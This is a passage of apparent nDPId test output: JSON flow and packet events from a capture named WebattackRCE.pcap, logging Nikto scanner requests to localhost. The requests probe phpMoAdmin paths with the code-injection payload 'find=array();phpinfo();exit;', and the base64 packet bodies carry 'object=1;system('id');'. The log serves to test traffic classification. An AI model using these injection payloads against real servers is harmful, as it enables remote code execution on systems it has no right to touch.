{"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
-01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277977,"pkt":"AAAAAAAAAAAAAAAACABFAAFqZD5AAEAG101\/AAABfwAAAcfWH5DMOF1rGOgpBIAYAED\/XgAAAQEICp1nAAGdZwABR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
-01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277980,"pkt":"AAAAAAAAAAAAAAAACABFAAFqHXJAAEAGHhp\/AAABfwAAAcfYH5AZXiQoPHeXDoAYAED\/XgAAAQEICp1nAASdZwAER0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":776,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277980,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277981,"pkt":"AAAAAAAAAAAAAAAACABFAAFn7phAAEAGTPZ\/AAABfwAAAcfaH5CzPtfCPnznp4AYAED\/WwAAAQEICp1nAAWdZwAFR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
-01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} -01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} 
-01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
-01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
